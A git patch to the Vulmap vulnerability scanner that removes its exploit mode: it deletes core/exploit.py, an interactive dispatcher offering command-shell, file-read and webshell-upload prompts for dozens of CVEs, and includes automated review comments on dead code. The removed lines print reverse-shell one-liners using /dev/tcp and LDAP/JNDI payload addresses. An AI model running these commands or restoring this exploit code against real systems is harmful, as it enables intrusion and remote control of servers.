From 6bd19e783d30d7f97788588126e5dcf58946ec1d Mon Sep 17 00:00:00 2001
From: zhzyker
Date: Wed, 1 Sep 2021 10:58:00 +0800
Subject: [PATCH] rm exploit
---
 core/core.py | 14 +-
 core/exploit.py | 390 ---------------------------------------------
 module/argparse.py | 3 -
 module/banner.py | 2 +-
 version | 2 +-
 vulmap.py | 4 +-
 6 files changed, 6 insertions(+), 409 deletions(-)
 delete mode 100644 core/exploit.py
diff --git a/core/core.py b/core/core.py
index e5ffe53..2be99e8 100644
--- a/core/core.py
+++ b/core/core.py
@@ -17,7 +17,6 @@ from module.api.dns import dns_result, dns_request
 from module.api.shodan import shodan_api
 from core.scan import scan
-from core.exploit import exploit
 from identify.identify import Identify
 from concurrent.futures import ThreadPoolExecutor, wait, ALL_COMPLETED
@@ -25,6 +24,7 @@ class Core(object):
 @staticmethod
 def control_options(args): # 选项控制,用于处理所有选项
+ mode = "poc"
 delay = globals.get_value("DELAY") # 获取全局变量延时时间DELAY
 now_warn = now.timed(de=delay) + color.red_warn()
 if args.socks:
@@ -37,8 +37,6 @@ def control_options(args): # 选项控制,用于处理所有选项
 exit(0)
 if args.thread_num != 10: # 判断是否为默认线程
 print(now.timed(de=0) + color.yel_info() + color.yellow(" Custom thread number: " + str(args.thread_num)))
- if args.vul is not None: # 判断是否-v进行漏洞利用
- args.mode = "exp" # 若进行漏洞利用修改模式为exp
 if args.debug is False: # 判断是否开启--debug功能
 print(now.timed(de=delay) + color.yel_info() + color.yellow(" Using debug mode to echo debug information"))
 globals.set_value("DEBUG", "debug") # 设置全局变量DEBUG
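Review bot: `mode = "poc"` added at the top of control_options is a constant, so the `if mode == "poc":` test introduced in the `@@ -55` hunk is always true and the trailing `else: print(now_warn + color.red(" Options error ... ..."))` kept in the `@@ -113` hunk is unreachable, unless mode is reassigned somewhere between the hunks (control_options continues outside every hunk shown). Either drop the variable together with the dead `else` and dedent the poc path, or document why a mode variable is kept, e.g. `mode = "poc"  # only scanning mode remains; kept so a future mode can be added here`. The `@@ -256` hunk likewise leaves control_webapps with a `mode` parameter that no longer has an `exp` branch; if `mode == "poc"` is the only comparison left, the parameter and its call sites can be simplified in the same commit.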
@@ -55,7 +53,7 @@ def control_options(args): # 选项控制,用于处理所有选项
 if os.path.isfile(args.O_JSON): # 判断json输出文件是否冲突
 print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_JSON + "] already exists"))
 exit(0)
- if args.mode is None or args.mode == "poc": # 判断是否进入poc模式
+ if mode == "poc": # 判断是否进入poc模式
 if args.url is not None and args.file is None: # 判断是否为仅-u扫描单个URL
 args.url = url_check(args.url) # 处理url格式
 if survival_check(args.url) == "f": # 检查目标存活状态
@@ -113,11 +111,6 @@ def control_options(args): # 选项控制,用于处理所有选项
 print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result text saved to: " + args.O_TEXT))
 if args.O_JSON:
 print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result json saved to: " + args.O_JSON))
- elif args.mode == "exp": # 漏洞利用模式参数较少
- if args.vul is not None and args.url is not None: # 判断是否进入漏洞利用模式
- core.control_webapps("url", args.url, args.vul, "exp")
- else:
- print(now_warn + color.red(" Options error, -v must specify -u"))
 else:
 print(now_warn + color.red(" Options error ... ..."))
@@ -256,9 +249,6 @@ def control_webapps(target_type, target, webapps, mode):
 joinall(gevent_pool) # 运行协程池
 wait(thread_poc, return_when=ALL_COMPLETED) # 等待所有多线程任务运行完
 print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended "))
- elif mode == "exp": # 漏洞利用
- vul_num = webapps
- exploit(target, vul_num) # 调用core中的exploit
 @staticmethod
 def scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, target):
diff --git a/core/exploit.py b/core/exploit.py
deleted file mode 100644
index f88335c..0000000
--- a/core/exploit.py
+++ /dev/null
@@ -1,390 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- -import sys -from module import globals -from module.time import now -from module.color import color -from module.allcheck import os_check, url_check, survival_check -from payload.ApacheShiro import ApacheShiro -from payload.ApacheSolr import ApacheSolr -from payload.ApacheTomcat import ApacheTomcat -from payload.Elasticsearch import Elasticsearch -from payload.Jenkins import Jenkins -from payload.Spring import Spring -from payload.OracleWeblogic import OracleWeblogic -from payload.ApacheFlink import ApacheFlink -from payload.Nexus import Nexus -from payload.RadHatJBoss import RedHatJBoss -from payload.ApacheUnomi import ApacheUnomi -from payload.ThinkPHP import ThinkPHP -from payload.Drupal import Drupal -from payload.ApacheStruts2 import ApacheStruts2 -from payload.Fastjson import Fastjson -from payload.ApacheDruid import ApacheDruid -from payload.Laravel import Laravel -from payload.Vmware import Vmware -from payload.SaltStack import SaltStack -from payload.Exchange import Exchange -from payload.F5_BIG_IP import BIG_IP -from payload.ApacheOFBiz import ApacheOFBiz -from payload.QiAnXin import QiAnXin -from payload.Eyou import Eyou -from payload.Ecology import Ecology - - -explists = ("CVE-2017-12629", "CVE-2019-17558", "S2-005", "S2-008", "S2-009", "S2-013", "S2-015", "S2-016", "S2-029", - "S2-032", "S2-045", "S2-046", "S2-048", "S2-052", "S2-057", "S2-059", "S2-061", "S2-devMode", - "CVE-2014-3120", "CVE-2015-1427", "CVE-2016-3088", "CVE-2016-4437", "CVE-2017-12615", "CVE-2020-1938", - "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-6340", "CVE-2018-1000861", "CVE-2019-7238", "CVE-2020-10199", - "CVE-2017-3506", "CVE-2017-10271", "CVE-2018-2894", "CVE-2019-2725", "CVE-2019-2729", "CVE-2020-2555", - "CVE-2020-2883", "CVE-2020-14882", "CVE-2010-0738", "CVE-2010-1428", "CVE-2015-7501", "CVE-2018-20062", - "CVE-2019-9082", "CVE-2020-13942", "CVE-2020-17519", "CVE-2019-3799", "CVE-2020-5410", 
"cve-2017-12629", - "cve-2019-17558", "s2-005", "s2-008", "s2-009", "s2-013", "s2-015", "s2-016", "s2-029", "s2-032", - "s2-045", "s2-046", "s2-048", "s2-052", "s2-057", "s2-059", "s2-061", "s2-devmode", "cve-2014-3120", - "cve-2015-1427", "cve-2016-3088", "cve-2016-4437", "cve-2017-12615", "cve-2020-1938", "cve-2018-7600", - "cve-2018-7602", "cve-2019-6340", "cve-2018-1000861", "cve-2019-7238", "cve-2020-10199", "cve-2017-3506", - "cve-2017-10271", "cve-2018-2894", "cve-2019-2725", "cve-2019-2729", "cve-2020-2555", "cve-2020-2883", - "cve-2020-14882", "cve-2010-0738", "cve-2010-1428", "cve-2015-7501", "cve-2018-20062", "cve-2019-9082", - "cve-2020-13942", "cve-2020-17519", "cve-2019-3799", "cve-2020-5410", "VER-1224-2", "VER-1224-1", "VER-1247", - "VER-1262", "ver-1224-2", "ver-1224-1", "ver-1247", "ver-1262", "ver-1224-3", "VER-1224-3", - "CVE-2021-25646", "cve-2021-25646", "CVE-2018-15133", "cve-2018-15133", "CVE-2021-21972", "cve-2021-21972", - "CVE-2021-25282", "cve-2021-25282", "CVE-2021-27065", "cve-2021-27065", "CVE-2021-22986", "cve-2021-22986", - "CVE-2020-5902", "cve-2020-5902", "CVE-2021-26295", "cve-2021-26295", "time-2021-0410", "CVE-2021-2109", - "cve-2021-2109", "cnvd-2021-26422", "CNVD-2021-26422", "CVE-2021-30128", "cve-2021-30128", "time-2021-0515", - "TIME-202-0515") - - -def exploit(target, vul_num): - target = url_check(target) - if survival_check(target) == "f": - print(now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + target)) - exit(0) - delay = globals.get_value("DELAY") # 获取全局变量DELAY - exp_apache_shiro = ApacheShiro(target) - exp_apache_solr = ApacheSolr(target) - exp_apache_tomcat = ApacheTomcat(target) - exp_elasticsearch = Elasticsearch(target) - exp_apache_flink = ApacheFlink(target) - exp_jenkins = Jenkins(target) - exp_spring = Spring(target) - exp_nexus = Nexus(target) - exp_oracle_weblogic = OracleWeblogic(target) - exp_redhat_jboss = RedHatJBoss(target) - exp_apache_unomi = ApacheUnomi(target) - 
exp_thinkphp = ThinkPHP(target) - exp_drupal = Drupal(target) - exp_fastjson = Fastjson(target) - exp_apache_struts2 = ApacheStruts2(target) - exp_apache_druid = ApacheDruid(target) - exp_laravel = Laravel(target) - exp_vmware = Vmware(target) - exp_saltstack = SaltStack(target) - exp_exchange = Exchange(target) - exp_big_ip = BIG_IP(target) - exp_apache_ofbiz = ApacheOFBiz(target) - exp_qianxin = QiAnXin(target) - exp_eyou = Eyou(target) - exp_ecology = Ecology(target) - print(now.timed(de=delay) + color.yel_info() + color.cyan(" Target url: " + target)) - print(now.timed(de=delay) + color.yel_info() + color.cyan(" Use exploit modules: " + vul_num)) - nc = now.timed(de=0) + color.yel_info() + color.yellow(" input \"nc\" bounce linux shell") - up = now.timed(de=0) + color.yel_info() + color.yellow(" input \"upload\" upload webshell") - rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(" RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)") - bash = now.timed(de=0) + color.yel_info() + color.yellow(" nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"") - bash_2 = now.timed(de=0) + color.yel_info() + color.yellow(" nc shell: \"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1\"") - jndi = now.timed(de=0) + color.yel_info() + color.yellow(" Reference https://github.com/feihong-cs/JNDIExploit") - cmd = "whoami" # 为了消除pycharm错误提示,没啥用 - file = "/etc/passwd" # 为了消除pycharm错误提示,没啥用 - path = "/tmp/test" # 为了消除pycharm错误提示,没啥用 - shiro_key = "1" # 为了消除pycharm错误提示,没啥用 - shiro_gadget = "1" # 为了消除pycharm错误提示,没啥用 - nexus_u = "admin" # 为了消除pycharm错误提示,没啥用 - nexus_p = "admin" # 为了消除pycharm错误提示,没啥用 - laravel_key = "null" # 为了消除pycharm错误提示,没啥用 - laravel_gadget = 1 # 为了消除pycharm错误提示,没啥用 - - if vul_num not in explists: - print(now.timed(de=0) + color.red_warn() + color.red( - " The vulnerability does not support exploitation. 
Please refer to \"--list\"")) - sys.exit(0) - - elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437": - if os_check() == "linux" or os_check() == "other": - shiro_key = input(now.timed(de=delay) + color.green("[+] key: ")) - shiro_gadget = input(now.timed(de=delay) + color.green("[+] gadget: ")) - elif os_check() == "windows": - shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ") - shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ") - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> ")) - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - sys.exit(0) - exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget) - elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938": - print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: WEB-INF/web.xml")) - while True: - if os_check() == "linux" or os_check() == "other": - file = input(now.timed(de=delay) + color.green("[+] File >>> ")) - elif os_check() == "windows": - file = input(now.no_color_timed(de=delay) + "[+] File >>> ") - if file == "exit" or file == "quit" or file == "bye": - exit(0) - exp_apache_tomcat.cve_2020_1938_exp(file) - elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799": - print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) - while True: - if os_check() == "linux" or os_check() == "other": - file = input(now.timed(de=delay) + color.green("[+] File >>> ")) - elif os_check() == "windows": - file = input(now.no_color_timed(de=delay) + "[+] File >>> ") - if file == "exit" or file == "quit" or file == "bye": - exit(0) - exp_spring.cve_2019_3799_exp(file) - elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410": - print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) - while True: - if 
os_check() == "linux" or os_check() == "other": - file = input(now.timed(de=delay) + color.green("[+] File >>> ")) - elif os_check() == "windows": - file = input(now.no_color_timed(de=delay) + "[+] File >>> ") - if file == "exit" or file == "quit" or file == "bye": - exit(0) - exp_spring.cve_2020_5410_exp(file) - elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519": - print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) - while True: - if os_check() == "linux" or os_check() == "other": - file = input(now.timed(de=delay) + color.green("[+] File >>> ")) - elif os_check() == "windows": - file = input(now.no_color_timed(de=delay) + "[+] File >>> ") - if file == "exit" or file == "quit" or file == "bye": - exit(0) - exp_apache_flink.cve_2020_17519_exp(file) - elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199": - if os_check() == "linux" or os_check() == "other": - nexus_u = input(now.timed(de=delay) + color.green("[+] Input username: ")) - nexus_p = input(now.timed(de=delay) + color.green("[+] Input password: ")) - elif os_check() == "windows": - nexus_u = input(now.no_color_timed(de=delay) + "[+] Input username: ") - nexus_p = input(now.no_color_timed(de=delay) + "[+] Input password: ") - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> ")) - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - sys.exit(0) - exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p) - elif vul_num == "CVE-2018-15133" or vul_num == "cve-2018-15133": - if os_check() == "linux" or os_check() == "other": - laravel_key = input(now.timed(de=delay) + color.green("[+] Input APP_KEY: ")) - elif os_check() == "windows": - laravel_key = input(now.no_color_timed(de=delay) + "[+] Input APP_KEY: ") - if os_check() == "linux" or os_check() == "other": - laravel_gadget = 
input(now.timed(de=delay) + color.green("[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ")) - elif os_check() == "windows": - laravel_gadget = input(now.no_color_timed(de=delay) + "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ") - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> ")) - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - sys.exit(0) - exp_laravel.cve_2018_15133_exp(cmd, laravel_key, laravel_gadget) - elif vul_num == "CVE-2021-21972" or vul_num == "cve-2021-21972": - if os_check() == "linux" or os_check() == "other": - os_type = input(now.timed(de=delay) + color.green("[+] The target os type (linux/windows): ")) - elif os_check() == "windows": - os_type = input(now.no_color_timed(de=delay) + "[+] The target os type (linux/windows): ") - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> ")) - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - sys.exit(0) - exp_vmware.cve_2021_21972_exp(cmd, os_type) - elif vul_num == "CVE-2021-25282" or vul_num == "cve-2021-25282": - if os_check() == "linux" or os_check() == "other": - file = input(now.timed(de=delay) + color.green("[+] upload file: ")) - path = input(now.timed(de=delay) + color.green("[+] upload path (e.g. /tmp/test.txt): ")) - elif os_check() == "windows": - file = input(now.no_color_timed(de=delay) + "[+] upload file: ") - path = input(now.no_color_timed(de=delay) + "[+] upload path (e.g. 
/tmp/test.txt): ") - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> ")) - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - sys.exit(0) - exp_saltstack.cve_2021_25282_exp(cmd, file, path) - elif vul_num == "CVE-2021-27065" or vul_num == "cve-2021-27065": - if os_check() == "linux" or os_check() == "other": - email = input(now.timed(de=delay) + color.green("[+] email: ")) - file = input(now.timed(de=delay) + color.green("[+] webshell name (e.g. shell.aspx): ")) - elif os_check() == "windows": - email = input(now.timed(de=delay) + "[+] email: ") - file = input(now.no_color_timed(de=delay) + "[+] uwebshell name (e.g. shell.aspx: ") - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> ")) - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - sys.exit(0) - exp_exchange.cve_2021_27065_exp(cmd, file, email) - elif vul_num == "CVE-2021-2109" or vul_num == "cve-2021-2109": - print(jndi) - if os_check() == "linux" or os_check() == "other": - ldap = input(now.timed(de=delay) + color.green("[+] ldap (e.g. ldap://127.0.0.1:1389/Basic/WeblogicEcho ): ")) - elif os_check() == "windows": - ldap = input(now.no_color_timed(de=delay) + color.green("[+] ldap (e.g. 
ldap://127.0.0.1:1389/Basic/WeblogicEcho ): ")) - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + "[+] Shell >>> ") - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - sys.exit(0) - exp_oracle_weblogic.cve_2021_2109_exp(ldap, cmd) - - # 远程命令执行漏洞单独简单运行 - else: - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> ")) - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - exit(0) - elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615": - exp_apache_tomcat.cve_2017_12615_exp(cmd) - elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120": - exp_elasticsearch.cve_2014_3120_exp(cmd) - elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427": - exp_elasticsearch.cve_2015_1427_exp(cmd) - elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861": - exp_jenkins.cve_2018_1000861_exp(cmd) - - elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506": - exp_oracle_weblogic.cve_2017_3506_exp(cmd) - elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271": - print(nc) - print(up) - exp_oracle_weblogic.cve_2017_10271_exp(cmd) - elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894": - exp_oracle_weblogic.cve_2018_2894_exp(cmd) - elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725": - print(nc) - print(up) - exp_oracle_weblogic.cve_2019_2725_exp(cmd) - elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729": - print(nc) - exp_oracle_weblogic.cve_2019_2729_exp(cmd) - elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555": - exp_oracle_weblogic.cve_2020_2555_exp(cmd) - elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883": - exp_oracle_weblogic.cve_2020_2883_exp(cmd) - elif vul_num == 
"CVE-2020-14882" or vul_num == "cve-2020-14882": - exp_oracle_weblogic.cve_2020_14882_exp(cmd) - elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629": - exp_apache_solr.cve_2017_12629_exp(cmd) - elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558": - exp_apache_solr.cve_2019_17558_exp(cmd) - elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238": - exp_nexus.cve_2019_7238_exp(cmd) - elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738": - exp_redhat_jboss.cve_2010_0738_exp(cmd) - elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428": - exp_redhat_jboss.cve_2010_1428_exp(cmd) - elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501": - exp_redhat_jboss.cve_2015_7501_exp(cmd) - elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942": - exp_apache_unomi.cve_2020_13942_exp(cmd) - - elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082": - print(up) - exp_thinkphp.cve_2019_9082_exp(cmd) - elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062": - exp_thinkphp.cve_2018_20062_exp(cmd) - elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600": - exp_drupal.cve_2018_7600_exp(cmd) - elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602": - exp_drupal.cve_2018_7602_exp(cmd) - elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340": - exp_drupal.cve_2019_6340_exp(cmd) - - elif vul_num == "S2-005" or vul_num == "s2-005": - exp_apache_struts2.s2_005_exp(cmd) - elif vul_num == "S2-008" or vul_num == "s2-008": - exp_apache_struts2.s2_008_exp(cmd) - elif vul_num == "S2-009" or vul_num == "s2-009": - exp_apache_struts2.s2_009_exp(cmd) - elif vul_num == "S2-013" or vul_num == "s2-013": - exp_apache_struts2.s2_013_exp(cmd) - elif vul_num == "S2-015" or vul_num == "s2-015": - exp_apache_struts2.s2_015_exp(cmd) - elif vul_num == "S2-016" or vul_num == "s2-016": - exp_apache_struts2.s2_016_exp(cmd) - elif vul_num == "S2-029" or vul_num == "s2-029": - exp_apache_struts2.s2_029_exp(cmd) - elif 
vul_num == "S2-032" or vul_num == "s2-032": - exp_apache_struts2.s2_032_exp(cmd) - elif vul_num == "S2-045" or vul_num == "s2-045": - exp_apache_struts2.s2_045_exp(cmd) - elif vul_num == "S2-046" or vul_num == "s2-046": - exp_apache_struts2.s2_046_exp(cmd) - elif vul_num == "S2-048" or vul_num == "s2-048": - exp_apache_struts2.s2_048_exp(cmd) - elif vul_num == "S2-052" or vul_num == "s2-052": - exp_apache_struts2.s2_052_exp(cmd) - elif vul_num == "S2-057" or vul_num == "s2-057": - exp_apache_struts2.s2_057_exp(cmd) - elif vul_num == "S2-059" or vul_num == "s2-059": - exp_apache_struts2.s2_059_exp(cmd) - elif vul_num == "S2-061" or vul_num == "s2-061": - exp_apache_struts2.s2_061_exp(cmd) - elif vul_num == "S2-devMode" or vul_num == "s2-devmode": - exp_apache_struts2.s2_devMode_exp(cmd) - - elif vul_num == "VER-1224-1" or vul_num == "ver-1224-1": - print(rmi_ldap) - exp_fastjson.fastjson_1224_1_exp(cmd) - elif vul_num == "VER-1224-2" or vul_num == "ver-1224-2": - exp_fastjson.fastjson_1224_2_exp(cmd) - elif vul_num == "VER-1224-3" or vul_num == "ver-1224-3": - exp_fastjson.fastjson_1224_3_exp(cmd) - elif vul_num == "VER-1247" or vul_num == "ver-1247": - print(rmi_ldap) - exp_fastjson.fastjson_1247_exp(cmd) - elif vul_num == "VER-1262" or vul_num == "ver-1262": - print(rmi_ldap) - exp_fastjson.fastjson_1262_exp(cmd) - elif vul_num == "CVE-2021-25646" or vul_num == "cve-2021-25646": - print(bash_2) - exp_apache_druid.cve_2021_25646_exp(cmd) - elif vul_num == "CVE-2021-22986" or vul_num == "cve-2021-22986": - exp_big_ip.cve_2021_22986_exp(cmd) - elif vul_num == "CVE-2020-5902" or vul_num == "cve-2020-5902": - print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) - exp_big_ip.cve_2020_5902_exp(cmd) - elif vul_num == "CVE-2021-26295" or vul_num == "cve-2021-26295": - print(now.timed(de=delay) + color.yel_info() + color.yellow(" java encode: http://www.jackson-t.ca/runtime-exec-payloads.html")) - exp_apache_ofbiz.cve_2021_26295_exp(cmd) - 
elif vul_num == "CVE-2021-30128" or vul_num == "cve-2021-30128":
- print(now.timed(de=delay) + color.yel_info() + color.yellow(" java encode: http://www.jackson-t.ca/runtime-exec-payloads.html"))
- exp_apache_ofbiz.cve_2021_30128_exp(cmd)
- elif vul_num == "time-2021-0410" or vul_num == "TIME-2021-0410":
- exp_qianxin.time_2021_0410_exp(cmd)
- elif vul_num == "CNVD-2021-26422" or vul_num == "cnvd-2021-26422":
- exp_eyou.cnvd_2021_26422_exp(cmd)
- elif vul_num == "time-2021-0515" or vul_num == "TIME-2021-0515":
- exp_ecology.time_2021_0515_exp(cmd)
-
- else:
- pass
diff --git a/module/argparse.py b/module/argparse.py
index fe303d7..d37e89c 100644
--- a/module/argparse.py
+++ b/module/argparse.py
@@ -11,9 +11,7 @@ def arg():
 target.add_argument("--fofa", dest="fofa", metavar='keyword', type=str, help=" call fofa api to scan (e.g. --fofa \"app=Apache-Shiro\")")
 target.add_argument("--shodan", dest="shodan", metavar='keyword', type=str, help=" call shodan api to scan (e.g. --shodan \"Shiro\")")
 mo = parser.add_argument_group("mode", "options vulnerability scanning or exploit mode")
- mo.add_argument("-m", "--mode", dest="mode", type=str, help="supports poc and exp, if not specified the default poc")
 mo.add_argument("-a", dest="app", type=str, nargs='+', help="specify webapps (e.g. -a \"tomcat\") allow multiple")
- mo.add_argument("-v", "--vul", type=str, default=None, help="exploit, specify vuln number (e.g. -v CVE-2019-2729)")
 ge = parser.add_argument_group("general", "general options")
 ge.add_argument("-h", "--help", action="help", help="show this help message and exit")
 ge.add_argument("-t", "--thread", dest="thread_num", type=int, default=10, metavar='NUM',
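Review bot: The context line `mo = parser.add_argument_group("mode", "options vulnerability scanning or exploit mode")` still advertises an exploit mode, although the `-m/--mode` and `-v/--vul` options that selected it are the two lines this hunk removes, so `--help` now describes a mode the parser can no longer accept. Update the description in the same commit, e.g. `mo = parser.add_argument_group("mode", "options for vulnerability scanning")`, or move `-a` into the target group since it is the only option left under "mode". The `-t/--thread` line at the end of the hunk is cut off; `arg()` continues outside it.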
@@ -42,7 +40,6 @@ def arg():
 example.add_argument(action='store_false', dest="python3 vulmap.py -u http://example.com\n "
 "python3 vulmap.py -u http://example.com -a struts2\n "
- "python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n "
 "python3 vulmap.py -f list.txt -a weblogic -t 20\n "
 "python3 vulmap.py -f list.txt --output-json results.json\n "
 "python3 vulmap.py --fofa \"app=Apache-Shiro\"")
diff --git a/module/banner.py b/module/banner.py
index b94097e..a6510b6 100644
--- a/module/banner.py
+++ b/module/banner.py
@@ -140,5 +140,5 @@ def vul_list():
 | Vmware vCenter | CVE-2021-21972 | Y | Y | 7.0 < 7.0U1c, 6.7 < 6.7U3l, 6.5 < 6.5U3n, any file upload |
 | VMware vRealize | CVE-2021-21975 | Y | N | <= 8.3.0, vmware vrealize operations manager api ssrf |
 +-------------------+------------------+-----+-----+-------------------------------------------------------------+
- """)
+ """ + color.yellow("\n Vulmap release does not provide the exploit function after September 1, 2021 \n"))
 return vuln_list
diff --git a/version b/version
index aec258d..b63ba69 100644
--- a/version
+++ b/version
@@ -1 +1 @@
-0.8
+0.9
diff --git a/vulmap.py b/vulmap.py
index af1db4f..5751736 100644
--- a/vulmap.py
+++ b/vulmap.py
@@ -28,13 +28,13 @@ def config():
 }
 globals.init() # 初始化全局变量模块
 globals.set_value("UA", args.ua) # 设置全局变量UA
- globals.set_value("VUL", args.vul) # 设置全局变量VULN用于判断是否漏洞利用模式
+ globals.set_value("VUL", None) # 设置全局变量VULN用于判断是否漏洞利用模式
 globals.set_value("CHECK", args.check) # 目标存活检测
 globals.set_value("DEBUG", args.debug) # 设置全局变量DEBUG
 globals.set_value("DELAY", args.delay) # 设置全局变量延时时间DELAY
 globals.set_value("DNSLOG", args.dnslog) # 用于判断使用哪个dnslog平台
 globals.set_value("DISMAP", "flase") # 是否接收dismap识别结果(false/true)
- globals.set_value("VULMAP", str(0.8)) # 设置全局变量程序版本号
+ globals.set_value("VULMAP", str(0.9)) # 设置全局变量程序版本号
 globals.set_value("O_TEXT", args.O_TEXT) # 设置全局变量OUTPUT判断是否输出TEXT
 globals.set_value("O_JSON", args.O_JSON) # 设置全局变量OUTPUT判断是否输出JSON
 globals.set_value("HEADERS", header) # 设置全局变量HEADERS
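Review bot: `globals.set_value("VUL", None)` pins to a constant a global whose own comment says it decides whether exploit mode is active, so the key is now a vestige; if anything elsewhere still calls `globals.get_value("VUL")` it keeps a dead exploit branch alive, and if nothing does, the line should go rather than stay with a comment that no longer describes it. At minimum rewrite the comment to say the value is fixed to None because the mode was removed. In the same hunk `globals.set_value("VULMAP", str(0.9))` duplicates the number in the `version` file, which is why this commit has to bump both; reading it once, e.g. `globals.set_value("VULMAP", pathlib.Path(__file__).with_name("version").read_text().strip())`, leaves a single source of truth. `config()` continues outside the hunk.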